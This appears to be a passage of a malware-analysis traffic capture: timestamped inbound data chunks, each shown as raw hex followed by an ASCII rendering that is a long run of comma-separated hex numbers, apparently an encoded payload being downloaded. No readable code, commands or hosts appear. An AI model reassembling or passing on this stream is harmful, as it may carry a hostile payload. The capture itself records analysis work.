2023-03-24 14:28:23 UTC	1392	IN	Data Raw: 34 2c 37 34 2c 31 30 37 2c 31 34 66 2c 62 33 2c 35 37 2c 35 63 2c 31 33 34 2c 62 64 2c 31 31 30 2c 65 35 2c 63 65 2c 38 38 2c 38 35 2c 34 38 2c 65 66 2c 31 36 39 2c 37 30 2c 62 63 2c 65 32 2c 65 33 2c 31 35 66 2c 64 31 2c 66 65 2c 31 33 30 2c 31 30 32 2c 31 34 64 2c 61 39 2c 62 37 2c 39 35 2c 39 66 2c 64 32 2c 36 30 2c 31 35 33 2c 31 30 34 2c 36 65 2c 31 31 30 2c 36 37 2c 63 64 2c 31 31 36 2c 31 35 37 2c 36 37 2c 31 34 37 2c 66 62 2c 63 38 2c 31 34 38 2c 61 64 2c 36 34 2c 64 34 2c 65 34 2c 31 35 36 2c 38 64 2c 39 33 2c 62 62 2c 39 34 2c 31 34 37 2c 66 65 2c 31 37 32 2c 31 31 32 2c 38 32 2c 66 65 2c 31 35 37 2c 36 64 2c 36 32 2c 31 31 31 2c 39 37 2c 31 32 38 2c 66 30 2c 38 33 2c 61 36 2c 38 61 2c 31 35 32 2c 31 34 33 2c 66 38 2c 64 31 2c 65 39 2c 34 38 2c Data Ascii: 4,74,107,14f,b3,57,5c,134,bd,110,e5,ce,88,85,48,ef,169,70,bc,e2,e3,15f,d1,fe,130,102,14d,a9,b7,95,9f,d2,60,153,104,6e,110,67,cd,116,157,67,147,fb,c8,148,ad,64,d4,e4,156,8d,93,bb,94,147,fe,172,112,82,fe,157,6d,62,111,97,128,f0,83,a6,8a,152,143,f8,d1,e9,48,
2023-03-24 14:28:23 UTC	1408	IN	Data Raw: 35 62 2c 31 31 37 2c 64 39 2c 65 30 2c 39 31 2c 37 63 2c 31 32 32 2c 31 35 31 2c 64 64 2c 38 33 2c 62 64 2c 65 32 2c 31 30 35 2c 64 62 2c 39 35 2c 31 31 61 2c 31 30 39 2c 66 38 2c 64 61 2c 34 61 2c 38 65 2c 61 35 2c 31 31 66 2c 37 61 2c 63 30 2c 31 34 63 2c 37 38 2c 35 62 2c 31 31 30 2c 31 30 30 2c 31 36 33 2c 31 31 39 2c 38 39 2c 31 30 38 2c 31 30 38 2c 31 31 33 2c 36 65 2c 36 65 2c 62 37 2c 38 36 2c 63 65 2c 66 30 2c 31 31 66 2c 64 62 2c 62 66 2c 62 35 2c 36 35 2c 31 30 33 2c 61 34 2c 61 35 2c 36 36 2c 37 39 2c 31 30 38 2c 34 37 2c 61 36 2c 37 63 2c 38 38 2c 63 31 2c 61 66 2c 62 33 2c 37 35 2c 66 64 2c 31 31 34 2c 64 62 2c 63 64 2c 31 31 35 2c 66 33 2c 32 65 2c 63 34 2c 36 32 2c 64 33 2c 63 33 2c 31 35 37 2c 31 34 64 2c 39 61 2c 31 31 37 2c 65 61 2c 61 Data Ascii: 5b,117,d9,e0,91,7c,122,151,dd,83,bd,e2,105,db,95,11a,109,f8,da,4a,8e,a5,11f,7a,c0,14c,78,5b,110,100,163,119,89,108,108,113,6e,6e,b7,86,ce,f0,11f,db,bf,b5,65,103,a4,a5,66,79,108,47,a6,7c,88,c1,af,b3,75,fd,114,db,cd,115,f3,2e,c4,62,d3,c3,157,14d,9a,117,ea,a
2023-03-24 14:28:23 UTC	1424	IN	Data Raw: 63 38 2c 31 31 63 2c 31 31 63 2c 39 66 2c 37 35 2c 37 32 2c 38 39 2c 31 33 31 2c 31 35 36 2c 62 38 2c 31 33 30 2c 38 65 2c 31 34 35 2c 31 31 61 2c 31 31 66 2c 31 32 38 2c 31 32 66 2c 31 33 38 2c 64 66 2c 65 38 2c 34 34 2c 61 65 2c 61 64 2c 31 32 33 2c 37 32 2c 37 30 2c 31 33 38 2c 36 31 2c 65 37 2c 64 30 2c 65 61 2c 39 35 2c 62 61 2c 62 64 2c 64 38 2c 37 39 2c 31 32 62 2c 38 63 2c 61 36 2c 31 32 37 2c 31 35 35 2c 31 30 33 2c 31 32 37 2c 31 35 31 2c 39 34 2c 37 35 2c 62 62 2c 65 65 2c 39 63 2c 61 63 2c 38 61 2c 31 33 62 2c 38 38 2c 31 36 65 2c 62 37 2c 61 66 2c 64 61 2c 35 63 2c 64 31 2c 31 35 31 2c 39 31 2c 31 30 63 2c 37 62 2c 66 36 2c 31 31 32 2c 31 35 36 2c 63 31 2c 31 31 61 2c 61 65 2c 65 34 2c 63 30 2c 31 31 33 2c 63 65 2c 31 32 66 2c 66 63 2c 31 30 Data Ascii: c8,11c,11c,9f,75,72,89,131,156,b8,130,8e,145,11a,11f,128,12f,138,df,e8,44,ae,ad,123,72,70,138,61,e7,d0,ea,95,ba,bd,d8,79,12b,8c,a6,127,155,103,127,151,94,75,bb,ee,9c,ac,8a,13b,88,16e,b7,af,da,5c,d1,151,91,10c,7b,f6,112,156,c1,11a,ae,e4,c0,113,ce,12f,fc,10
2023-03-24 14:28:24 UTC	1440	IN	Data Raw: 31 2c 38 65 2c 31 33 66 2c 38 31 2c 31 34 31 2c 65 36 2c 31 34 35 2c 31 33 33 2c 39 65 2c 38 66 2c 62 30 2c 61 39 2c 65 31 2c 63 33 2c 39 65 2c 38 34 2c 31 33 33 2c 31 36 34 2c 66 62 2c 63 34 2c 39 32 2c 31 31 62 2c 31 32 32 2c 31 33 66 2c 31 32 62 2c 36 64 2c 31 30 30 2c 36 37 2c 37 61 2c 31 33 36 2c 31 34 34 2c 31 32 37 2c 66 34 2c 65 30 2c 36 61 2c 39 63 2c 39 64 2c 66 34 2c 37 66 2c 38 33 2c 62 39 2c 64 65 2c 62 38 2c 65 64 2c 31 33 30 2c 38 33 2c 39 33 2c 31 35 61 2c 61 35 2c 62 61 2c 31 30 32 2c 62 65 2c 63 66 2c 39 33 2c 31 32 31 2c 31 33 62 2c 63 39 2c 66 38 2c 31 34 35 2c 64 38 2c 61 31 2c 37 31 2c 31 30 33 2c 61 39 2c 64 30 2c 34 62 2c 31 31 33 2c 31 34 38 2c 61 66 2c 64 35 2c 63 61 2c 61 30 2c 35 35 2c 66 33 2c 37 66 2c 63 65 2c 31 33 37 2c 37 Data Ascii: 1,8e,13f,81,141,e6,145,133,9e,8f,b0,a9,e1,c3,9e,84,133,164,fb,c4,92,11b,122,13f,12b,6d,100,67,7a,136,144,127,f4,e0,6a,9c,9d,f4,7f,83,b9,de,b8,ed,130,83,93,15a,a5,ba,102,be,cf,93,121,13b,c9,f8,145,d8,a1,71,103,a9,d0,4b,113,148,af,d5,ca,a0,55,f3,7f,ce,137,7
2023-03-24 14:28:24 UTC	1456	IN	Data Raw: 34 64 2c 64 65 2c 63 62 2c 61 35 2c 31 34 62 2c 31 34 33 2c 31 32 65 2c 31 32 62 2c 31 33 30 2c 62 35 2c 31 31 65 2c 66 61 2c 35 35 2c 31 30 66 2c 31 32 65 2c 37 66 2c 31 34 32 2c 37 61 2c 31 33 32 2c 38 37 2c 31 34 35 2c 31 30 35 2c 61 37 2c 37 30 2c 39 39 2c 63 65 2c 31 32 36 2c 38 36 2c 62 65 2c 66 37 2c 31 32 62 2c 65 31 2c 31 32 39 2c 38 39 2c 64 66 2c 34 38 2c 31 35 30 2c 35 61 2c 31 35 33 2c 31 34 38 2c 61 30 2c 31 32 61 2c 65 62 2c 62 31 2c 31 31 36 2c 31 32 38 2c 31 34 36 2c 31 35 38 2c 31 32 30 2c 65 62 2c 33 61 2c 62 61 2c 31 35 63 2c 31 30 65 2c 66 62 2c 38 39 2c 61 33 2c 36 32 2c 65 65 2c 39 30 2c 31 32 34 2c 36 34 2c 66 64 2c 62 63 2c 31 34 31 2c 65 36 2c 31 31 38 2c 31 32 34 2c 36 39 2c 63 31 2c 65 63 2c 63 37 2c 63 31 2c 61 31 2c 31 31 38 Data Ascii: 4d,de,cb,a5,14b,143,12e,12b,130,b5,11e,fa,55,10f,12e,7f,142,7a,132,87,145,105,a7,70,99,ce,126,86,be,f7,12b,e1,129,89,df,48,150,5a,153,148,a0,12a,eb,b1,116,128,146,158,120,eb,3a,ba,15c,10e,fb,89,a3,62,ee,90,124,64,fd,bc,141,e6,118,124,69,c1,ec,c7,c1,a1,118
2023-03-24 14:28:24 UTC	1472	IN	Data Raw: 2c 31 31 37 2c 66 35 2c 31 34 63 2c 38 39 2c 31 31 30 2c 62 37 2c 31 30 35 2c 31 30 38 2c 31 37 30 2c 65 35 2c 64 36 2c 63 36 2c 31 30 64 2c 36 63 2c 37 36 2c 31 31 36 2c 39 61 2c 36 65 2c 31 30 35 2c 62 37 2c 31 33 61 2c 39 66 2c 31 30 37 2c 31 32 66 2c 35 39 2c 31 30 32 2c 38 34 2c 36 64 2c 65 33 2c 31 36 33 2c 62 39 2c 65 38 2c 35 38 2c 63 38 2c 38 31 2c 61 32 2c 65 63 2c 39 37 2c 31 31 66 2c 31 34 35 2c 66 64 2c 31 35 31 2c 63 65 2c 64 64 2c 31 30 36 2c 31 30 65 2c 66 65 2c 64 61 2c 38 39 2c 63 33 2c 31 35 66 2c 62 62 2c 31 34 66 2c 61 31 2c 65 32 2c 31 33 65 2c 37 33 2c 63 31 2c 31 33 39 2c 31 33 30 2c 37 35 2c 31 34 61 2c 34 61 2c 65 30 2c 31 31 39 2c 65 63 2c 66 61 2c 64 63 2c 31 30 31 2c 65 37 2c 31 32 36 2c 31 31 63 2c 31 34 39 2c 31 33 30 2c 63 Data Ascii: ,117,f5,14c,89,110,b7,105,108,170,e5,d6,c6,10d,6c,76,116,9a,6e,105,b7,13a,9f,107,12f,59,102,84,6d,e3,163,b9,e8,58,c8,81,a2,ec,97,11f,145,fd,151,ce,dd,106,10e,fe,da,89,c3,15f,bb,14f,a1,e2,13e,73,c1,139,130,75,14a,4a,e0,119,ec,fa,dc,101,e7,126,11c,149,130,c
2023-03-24 14:28:24 UTC	1488	IN	Data Raw: 33 31 2c 31 33 62 2c 31 32 37 2c 62 38 2c 33 32 2c 31 32 30 2c 37 38 2c 64 63 2c 31 35 31 2c 63 34 2c 31 30 33 2c 62 37 2c 31 36 34 2c 31 32 32 2c 35 64 2c 31 32 31 2c 35 62 2c 39 65 2c 31 35 33 2c 62 30 2c 33 35 2c 31 34 65 2c 36 33 2c 31 31 32 2c 62 65 2c 39 34 2c 31 33 34 2c 61 39 2c 31 30 34 2c 31 34 33 2c 37 36 2c 38 65 2c 38 35 2c 66 63 2c 66 39 2c 36 34 2c 65 32 2c 61 32 2c 63 61 2c 38 37 2c 66 61 2c 31 33 63 2c 37 62 2c 62 64 2c 65 61 2c 31 34 36 2c 62 63 2c 36 32 2c 61 32 2c 31 34 34 2c 38 31 2c 39 62 2c 37 32 2c 65 31 2c 37 32 2c 31 30 36 2c 62 61 2c 31 30 33 2c 31 30 65 2c 65 35 2c 33 61 2c 35 33 2c 31 31 38 2c 38 63 2c 64 34 2c 63 64 2c 31 33 36 2c 61 62 2c 63 64 2c 37 39 2c 31 31 33 2c 38 33 2c 62 37 2c 31 35 61 2c 61 61 2c 37 61 2c 31 36 65 Data Ascii: 31,13b,127,b8,32,120,78,dc,151,c4,103,b7,164,122,5d,121,5b,9e,153,b0,35,14e,63,112,be,94,134,a9,104,143,76,8e,85,fc,f9,64,e2,a2,ca,87,fa,13c,7b,bd,ea,146,bc,62,a2,144,81,9b,72,e1,72,106,ba,103,10e,e5,3a,53,118,8c,d4,cd,136,ab,cd,79,113,83,b7,15a,aa,7a,16e
2023-03-24 14:28:24 UTC	1504	IN	Data Raw: 31 65 2c 31 33 33 2c 31 31 37 2c 31 33 66 2c 38 62 2c 63 31 2c 64 37 2c 34 33 2c 36 63 2c 65 64 2c 37 63 2c 61 64 2c 39 36 2c 65 63 2c 31 32 34 2c 31 32 62 2c 31 30 61 2c 64 37 2c 31 31 65 2c 31 33 34 2c 35 66 2c 33 65 2c 37 32 2c 64 31 2c 66 32 2c 65 31 2c 31 31 34 2c 39 38 2c 39 31 2c 61 34 2c 37 31 2c 33 66 2c 31 32 62 2c 36 31 2c 31 33 63 2c 39 37 2c 37 62 2c 35 33 2c 31 33 32 2c 39 38 2c 62 30 2c 31 33 30 2c 31 34 64 2c 62 30 2c 62 39 2c 36 31 2c 31 33 38 2c 31 34 66 2c 37 63 2c 61 34 2c 66 63 2c 65 62 2c 35 65 2c 31 31 64 2c 31 34 64 2c 66 63 2c 66 30 2c 31 36 31 2c 31 34 63 2c 64 33 2c 61 63 2c 39 65 2c 31 33 32 2c 31 32 31 2c 38 34 2c 62 39 2c 31 33 33 2c 31 34 66 2c 36 61 2c 31 31 31 2c 64 31 2c 63 39 2c 38 30 2c 65 36 2c 31 35 62 2c 39 63 2c 65 Data Ascii: 1e,133,117,13f,8b,c1,d7,43,6c,ed,7c,ad,96,ec,124,12b,10a,d7,11e,134,5f,3e,72,d1,f2,e1,114,98,91,a4,71,3f,12b,61,13c,97,7b,53,132,98,b0,130,14d,b0,b9,61,138,14f,7c,a4,fc,eb,5e,11d,14d,fc,f0,161,14c,d3,ac,9e,132,121,84,b9,133,14f,6a,111,d1,c9,80,e6,15b,9c,e
2023-03-24 14:28:24 UTC	1520	IN	Data Raw: 65 35 2c 61 36 2c 61 35 2c 63 65 2c 62 34 2c 31 32 33 2c 65 39 2c 66 39 2c 34 65 2c 38 65 2c 39 33 2c 37 62 2c 63 34 2c 36 65 2c 63 37 2c 31 33 38 2c 31 34 30 2c 37 32 2c 31 31 39 2c 34 65 2c 37 66 2c 37 64 2c 64 35 2c 37 35 2c 63 39 2c 38 39 2c 62 36 2c 39 64 2c 63 31 2c 39 65 2c 37 66 2c 37 61 2c 62 64 2c 35 65 2c 31 33 36 2c 39 65 2c 36 32 2c 39 35 2c 31 30 33 2c 31 32 64 2c 64 62 2c 37 38 2c 64 38 2c 31 31 38 2c 36 37 2c 62 33 2c 39 61 2c 37 33 2c 64 33 2c 38 38 2c 31 33 64 2c 66 61 2c 65 66 2c 63 38 2c 39 65 2c 37 38 2c 31 32 32 2c 31 31 34 2c 31 30 30 2c 31 32 66 2c 31 34 64 2c 31 31 38 2c 31 30 37 2c 61 65 2c 31 33 30 2c 34 65 2c 66 66 2c 66 65 2c 61 36 2c 62 35 2c 31 32 65 2c 31 35 62 2c 39 33 2c 38 64 2c 63 39 2c 61 66 2c 62 30 2c 36 30 2c 39 32 Data Ascii: e5,a6,a5,ce,b4,123,e9,f9,4e,8e,93,7b,c4,6e,c7,138,140,72,119,4e,7f,7d,d5,75,c9,89,b6,9d,c1,9e,7f,7a,bd,5e,136,9e,62,95,103,12d,db,78,d8,118,67,b3,9a,73,d3,88,13d,fa,ef,c8,9e,78,122,114,100,12f,14d,118,107,ae,130,4e,ff,fe,a6,b5,12e,15b,93,8d,c9,af,b0,60,92
2023-03-24 14:28:24 UTC	1536	IN	Data Raw: 36 62 2c 39 63 2c 31 34 36 2c 31 33 35 2c 31 32 32 2c 64 32 2c 64 37 2c 31 30 36 2c 31 32 63 2c 38 64 2c 38 36 2c 64 31 2c 31 32 32 2c 65 33 2c 64 62 2c 39 61 2c 38 35 2c 31 30 64 2c 63 61 2c 31 32 36 2c 66 61 2c 36 34 2c 65 34 2c 37 35 2c 39 66 2c 37 32 2c 31 35 37 2c 62 66 2c 31 34 30 2c 37 35 2c 61 62 2c 39 37 2c 31 34 66 2c 64 65 2c 62 35 2c 62 34 2c 39 62 2c 31 31 31 2c 31 31 36 2c 39 65 2c 62 62 2c 31 34 64 2c 31 33 39 2c 62 65 2c 31 32 33 2c 31 30 36 2c 61 38 2c 38 63 2c 63 34 2c 61 65 2c 31 34 35 2c 34 66 2c 35 30 2c 31 35 33 2c 63 65 2c 31 33 66 2c 65 31 2c 66 62 2c 31 32 31 2c 31 30 62 2c 37 37 2c 64 66 2c 31 32 36 2c 62 63 2c 31 33 65 2c 38 63 2c 37 64 2c 31 32 61 2c 37 62 2c 31 33 32 2c 33 61 2c 65 31 2c 36 34 2c 31 30 63 2c 31 31 66 2c 65 62 Data Ascii: 6b,9c,146,135,122,d2,d7,106,12c,8d,86,d1,122,e3,db,9a,85,10d,ca,126,fa,64,e4,75,9f,72,157,bf,140,75,ab,97,14f,de,b5,b4,9b,111,116,9e,bb,14d,139,be,123,106,a8,8c,c4,ae,145,4f,50,153,ce,13f,e1,fb,121,10b,77,df,126,bc,13e,8c,7d,12a,7b,132,3a,e1,64,10c,11f,eb
2023-03-24 14:28:24 UTC	1552	IN	Data Raw: 33 65 2c 37 35 2c 31 37 34 2c 37 61 2c 64 66 2c 31 32 34 2c 31 32 66 2c 31 35 39 2c 31 32 33 2c 35 35 2c 61 31 2c 38 31 2c 35 31 2c 63 66 2c 65 65 2c 31 33 64 2c 31 32 61 2c 61 61 2c 34 62 2c 66 63 2c 31 32 35 2c 31 30 35 2c 62 65 2c 61 62 2c 37 62 2c 38 64 2c 39 62 2c 35 66 2c 37 36 2c 39 33 2c 31 35 32 2c 31 33 37 2c 31 35 36 2c 61 39 2c 31 34 63 2c 65 65 2c 36 37 2c 63 65 2c 35 63 2c 31 31 33 2c 63 61 2c 38 35 2c 37 34 2c 38 33 2c 31 32 32 2c 61 34 2c 63 62 2c 61 36 2c 31 30 37 2c 31 32 64 2c 61 39 2c 63 30 2c 62 61 2c 31 34 33 2c 61 33 2c 61 37 2c 39 64 2c 31 30 64 2c 62 62 2c 31 34 37 2c 65 38 2c 31 33 63 2c 64 37 2c 61 34 2c 65 33 2c 31 31 66 2c 66 62 2c 64 31 2c 32 64 2c 39 63 2c 62 39 2c 62 66 2c 36 34 2c 31 33 34 2c 35 39 2c 38 30 2c 64 30 2c 63 Data Ascii: 3e,75,174,7a,df,124,12f,159,123,55,a1,81,51,cf,ee,13d,12a,aa,4b,fc,125,105,be,ab,7b,8d,9b,5f,76,93,152,137,156,a9,14c,ee,67,ce,5c,113,ca,85,74,83,122,a4,cb,a6,107,12d,a9,c0,ba,143,a3,a7,9d,10d,bb,147,e8,13c,d7,a4,e3,11f,fb,d1,2d,9c,b9,bf,64,134,59,80,d0,c
2023-03-24 14:28:24 UTC	1568	IN	Data Raw: 2c 35 38 2c 31 35 39 2c 31 32 30 2c 66 66 2c 61 33 2c 61 33 2c 66 63 2c 39 62 2c 31 37 32 2c 66 66 2c 39 63 2c 65 36 2c 64 31 2c 35 36 2c 31 32 38 2c 61 63 2c 39 32 2c 36 66 2c 62 39 2c 39 34 2c 31 31 62 2c 62 61 2c 33 61 2c 31 33 64 2c 64 37 2c 61 33 2c 31 34 65 2c 31 33 37 2c 65 38 2c 31 36 61 2c 31 30 65 2c 35 64 2c 38 35 2c 36 65 2c 38 38 2c 65 38 2c 36 63 2c 38 33 2c 31 31 64 2c 31 35 34 2c 31 34 31 2c 36 39 2c 31 32 65 2c 62 65 2c 66 36 2c 31 33 39 2c 34 39 2c 31 30 66 2c 31 30 32 2c 38 33 2c 31 33 33 2c 63 35 2c 38 62 2c 31 34 63 2c 34 32 2c 37 37 2c 39 36 2c 39 38 2c 37 64 2c 62 65 2c 37 61 2c 62 64 2c 62 63 2c 31 31 30 2c 38 63 2c 62 66 2c 61 64 2c 65 39 2c 34 32 2c 37 64 2c 62 62 2c 39 66 2c 65 35 2c 65 33 2c 65 62 2c 38 61 2c 31 30 66 2c 36 31 Data Ascii: ,58,159,120,ff,a3,a3,fc,9b,172,ff,9c,e6,d1,56,128,ac,92,6f,b9,94,11b,ba,3a,13d,d7,a3,14e,137,e8,16a,10e,5d,85,6e,88,e8,6c,83,11d,154,141,69,12e,be,f6,139,49,10f,102,83,133,c5,8b,14c,42,77,96,98,7d,be,7a,bd,bc,110,8c,bf,ad,e9,42,7d,bb,9f,e5,e3,eb,8a,10f,61
2023-03-24 14:28:24 UTC	1584	IN	Data Raw: 32 2c 61 32 2c 64 38 2c 61 61 2c 66 32 2c 61 32 2c 65 36 2c 65 64 2c 31 33 30 2c 39 63 2c 63 33 2c 34 66 2c 61 33 2c 31 33 62 2c 39 32 2c 38 30 2c 31 33 35 2c 33 39 2c 31 30 34 2c 62 61 2c 31 30 38 2c 61 61 2c 31 35 34 2c 61 62 2c 35 66 2c 63 33 2c 31 33 61 2c 31 32 34 2c 31 32 65 2c 64 31 2c 31 30 63 2c 38 63 2c 62 31 2c 39 31 2c 62 61 2c 66 39 2c 31 34 36 2c 31 33 62 2c 31 35 34 2c 62 66 2c 39 36 2c 63 34 2c 62 62 2c 65 64 2c 31 30 38 2c 66 39 2c 62 64 2c 64 63 2c 61 36 2c 62 30 2c 31 30 30 2c 66 30 2c 31 35 38 2c 37 38 2c 65 36 2c 31 34 62 2c 37 63 2c 39 34 2c 31 31 62 2c 66 61 2c 31 33 32 2c 62 65 2c 62 35 2c 37 65 2c 64 35 2c 64 62 2c 64 64 2c 39 39 2c 63 36 2c 31 34 64 2c 63 64 2c 64 30 2c 37 62 2c 31 32 66 2c 65 30 2c 39 33 2c 34 61 2c 38 66 2c 61 Data Ascii: 2,a2,d8,aa,f2,a2,e6,ed,130,9c,c3,4f,a3,13b,92,80,135,39,104,ba,108,aa,154,ab,5f,c3,13a,124,12e,d1,10c,8c,b1,91,ba,f9,146,13b,154,bf,96,c4,bb,ed,108,f9,bd,dc,a6,b0,100,f0,158,78,e6,14b,7c,94,11b,fa,132,be,b5,7e,d5,db,dd,99,c6,14d,cd,d0,7b,12f,e0,93,4a,8f,a
2023-03-24 14:28:24 UTC	1600	IN	Data Raw: 37 2c 38 39 2c 31 30 36 2c 61 35 2c 62 66 2c 35 61 2c 39 33 2c 31 31 34 2c 62 65 2c 37 35 2c 37 31 2c 35 35 2c 35 39 2c 31 30 39 2c 62 39 2c 31 36 65 2c 66 66 2c 63 35 2c 31 30 39 2c 31 32 32 2c 66 66 2c 61 66 2c 66 39 2c 31 31 34 2c 31 37 32 2c 63 34 2c 31 33 34 2c 61 66 2c 31 30 38 2c 63 35 2c 31 31 30 2c 31 30 36 2c 31 34 33 2c 31 32 39 2c 64 63 2c 37 62 2c 31 32 65 2c 31 34 64 2c 31 33 61 2c 65 63 2c 35 39 2c 63 39 2c 36 37 2c 37 32 2c 66 64 2c 34 36 2c 63 65 2c 61 36 2c 31 35 33 2c 31 33 31 2c 39 63 2c 38 63 2c 31 34 37 2c 34 63 2c 39 39 2c 62 39 2c 39 37 2c 36 37 2c 35 63 2c 65 35 2c 66 62 2c 31 32 64 2c 61 33 2c 66 64 2c 31 31 35 2c 31 33 64 2c 66 37 2c 37 39 2c 66 35 2c 35 66 2c 31 32 65 2c 38 63 2c 66 34 2c 66 32 2c 34 38 2c 31 31 33 2c 64 64 2c Data Ascii: 7,89,106,a5,bf,5a,93,114,be,75,71,55,59,109,b9,16e,ff,c5,109,122,ff,af,f9,114,172,c4,134,af,108,c5,110,106,143,129,dc,7b,12e,14d,13a,ec,59,c9,67,72,fd,46,ce,a6,153,131,9c,8c,147,4c,99,b9,97,67,5c,e5,fb,12d,a3,fd,115,13d,f7,79,f5,5f,12e,8c,f4,f2,48,113,dd,
2023-03-24 14:28:24 UTC	1616	IN	Data Raw: 65 2c 63 61 2c 31 33 35 2c 62 37 2c 31 30 35 2c 63 64 2c 31 34 36 2c 66 35 2c 31 31 31 2c 31 30 64 2c 37 31 2c 35 62 2c 38 64 2c 37 34 2c 64 31 2c 38 38 2c 31 35 61 2c 61 64 2c 62 64 2c 66 34 2c 31 31 39 2c 61 33 2c 37 36 2c 63 65 2c 31 32 66 2c 31 30 66 2c 65 38 2c 36 37 2c 61 37 2c 36 61 2c 63 35 2c 31 31 34 2c 63 34 2c 31 35 35 2c 64 64 2c 66 36 2c 31 33 62 2c 31 32 33 2c 31 35 65 2c 31 33 34 2c 63 37 2c 31 33 31 2c 62 39 2c 65 31 2c 31 35 31 2c 38 34 2c 62 65 2c 31 36 65 2c 63 37 2c 63 65 2c 61 37 2c 31 32 62 2c 31 33 63 2c 61 38 2c 38 37 2c 38 36 2c 61 61 2c 64 37 2c 66 62 2c 63 62 2c 38 62 2c 65 61 2c 37 64 2c 38 64 2c 39 39 2c 65 35 2c 31 31 63 2c 66 32 2c 31 32 63 2c 38 61 2c 61 65 2c 61 64 2c 64 34 2c 31 31 36 2c 66 34 2c 31 30 63 2c 38 64 2c 37 Data Ascii: e,ca,135,b7,105,cd,146,f5,111,10d,71,5b,8d,74,d1,88,15a,ad,bd,f4,119,a3,76,ce,12f,10f,e8,67,a7,6a,c5,114,c4,155,dd,f6,13b,123,15e,134,c7,131,b9,e1,151,84,be,16e,c7,ce,a7,12b,13c,a8,87,86,aa,d7,fb,cb,8b,ea,7d,8d,99,e5,11c,f2,12c,8a,ae,ad,d4,116,f4,10c,8d,7
2023-03-24 14:28:24 UTC	1632	IN	Data Raw: 33 35 2c 64 35 2c 31 32 30 2c 31 34 65 2c 31 33 32 2c 31 31 66 2c 63 34 2c 31 30 66 2c 65 62 2c 31 34 64 2c 64 34 2c 31 31 34 2c 38 31 2c 61 63 2c 31 30 36 2c 62 34 2c 37 39 2c 66 37 2c 31 32 31 2c 63 63 2c 31 30 66 2c 66 34 2c 31 31 37 2c 31 30 66 2c 31 31 39 2c 31 33 36 2c 66 32 2c 31 31 36 2c 63 33 2c 35 37 2c 64 66 2c 65 66 2c 66 64 2c 35 64 2c 39 38 2c 39 64 2c 61 35 2c 31 30 30 2c 31 33 63 2c 64 32 2c 31 33 35 2c 65 61 2c 37 63 2c 64 35 2c 66 61 2c 65 34 2c 63 64 2c 37 35 2c 38 39 2c 61 66 2c 65 34 2c 31 31 65 2c 31 32 66 2c 61 62 2c 64 38 2c 65 62 2c 37 32 2c 38 36 2c 66 32 2c 31 31 36 2c 63 33 2c 66 37 2c 64 65 2c 66 31 2c 31 32 64 2c 65 33 2c 39 39 2c 39 64 2c 61 35 2c 36 66 2c 63 34 2c 31 31 31 2c 31 36 66 2c 31 35 35 2c 62 33 2c 38 35 2c 38 31 Data Ascii: 35,d5,120,14e,132,11f,c4,10f,eb,14d,d4,114,81,ac,106,b4,79,f7,121,cc,10f,f4,117,10f,119,136,f2,116,c3,57,df,ef,fd,5d,98,9d,a5,100,13c,d2,135,ea,7c,d5,fa,e4,cd,75,89,af,e4,11e,12f,ab,d8,eb,72,86,f2,116,c3,f7,de,f1,12d,e3,99,9d,a5,6f,c4,111,16f,155,b3,85,81
2023-03-24 14:28:24 UTC	1648	IN	Data Raw: 66 37 2c 31 32 31 2c 31 31 63 2c 66 66 2c 61 62 2c 61 30 2c 36 30 2c 63 65 2c 31 30 64 2c 65 61 2c 36 37 2c 62 38 2c 65 61 2c 64 61 2c 63 61 2c 63 35 2c 31 31 34 2c 31 31 63 2c 63 35 2c 61 34 2c 36 66 2c 38 63 2c 31 32 33 2c 31 35 65 2c 66 35 2c 31 31 33 2c 31 30 61 2c 31 33 31 2c 36 33 2c 38 64 2c 37 34 2c 31 33 30 2c 62 36 2c 65 34 2c 31 35 61 2c 66 32 2c 31 35 63 2c 39 66 2c 36 30 2c 38 36 2c 38 36 2c 61 61 2c 38 66 2c 38 30 2c 61 66 2c 31 32 30 2c 65 64 2c 31 32 64 2c 38 65 2c 39 39 2c 39 64 2c 31 33 65 2c 34 61 2c 31 30 64 2c 66 35 2c 31 36 36 2c 61 65 2c 38 63 2c 38 64 2c 38 30 2c 65 31 2c 64 38 2c 31 32 63 2c 38 61 2c 61 66 2c 39 63 2c 39 66 2c 38 33 2c 61 65 2c 64 38 2c 64 64 2c 64 62 2c 31 33 36 2c 61 39 2c 38 66 2c 38 30 2c 36 37 2c 61 34 2c 65 Data Ascii: f7,121,11c,ff,ab,a0,60,ce,10d,ea,67,b8,ea,da,ca,c5,114,11c,c5,a4,6f,8c,123,15e,f5,113,10a,131,63,8d,74,130,b6,e4,15a,f2,15c,9f,60,86,86,aa,8f,80,af,120,ed,12d,8e,99,9d,13e,4a,10d,f5,166,ae,8c,8d,80,e1,d8,12c,8a,af,9c,9f,83,ae,d8,dd,db,136,a9,8f,80,67,a4,e
2023-03-24 14:28:24 UTC	1664	IN	Data Raw: 64 37 2c 31 31 64 2c 62 38 2c 34 64 2c 65 62 2c 31 31 32 2c 62 63 2c 38 34 2c 61 66 2c 39 63 2c 31 31 63 2c 31 32 66 2c 62 38 2c 39 33 2c 65 62 2c 63 61 2c 36 32 2c 38 61 2c 31 31 38 2c 39 34 2c 34 33 2c 38 37 2c 39 39 2c 31 31 30 2c 35 63 2c 63 39 2c 63 61 2c 31 33 32 2c 64 38 2c 31 30 38 2c 38 61 2c 61 65 2c 61 64 2c 31 31 31 2c 31 31 64 2c 62 34 2c 66 35 2c 31 30 32 2c 65 34 2c 38 39 2c 61 66 2c 39 63 2c 31 33 32 2c 38 33 2c 38 38 2c 38 34 2c 66 39 2c 66 31 2c 66 36 2c 61 61 2c 38 66 2c 38 30 2c 39 61 2c 31 33 34 2c 37 65 2c 35 39 2c 36 39 2c 31 32 61 2c 31 30 38 2c 31 31 35 2c 36 66 2c 38 63 2c 38 61 2c 31 32 62 2c 31 33 37 2c 39 38 2c 63 61 2c 31 30 65 2c 61 64 2c 63 64 2c 37 35 2c 38 39 2c 61 66 2c 31 32 31 2c 31 31 32 2c 61 37 2c 61 35 2c 61 30 2c Data Ascii: d7,11d,b8,4d,eb,112,bc,84,af,9c,11c,12f,b8,93,eb,ca,62,8a,118,94,43,87,99,110,5c,c9,ca,132,d8,108,8a,ae,ad,111,11d,b4,f5,102,e4,89,af,9c,132,83,88,84,f9,f1,f6,aa,8f,80,9a,134,7e,59,69,12a,108,115,6f,8c,8a,12b,137,98,ca,10e,ad,cd,75,89,af,121,112,a7,a5,a0,
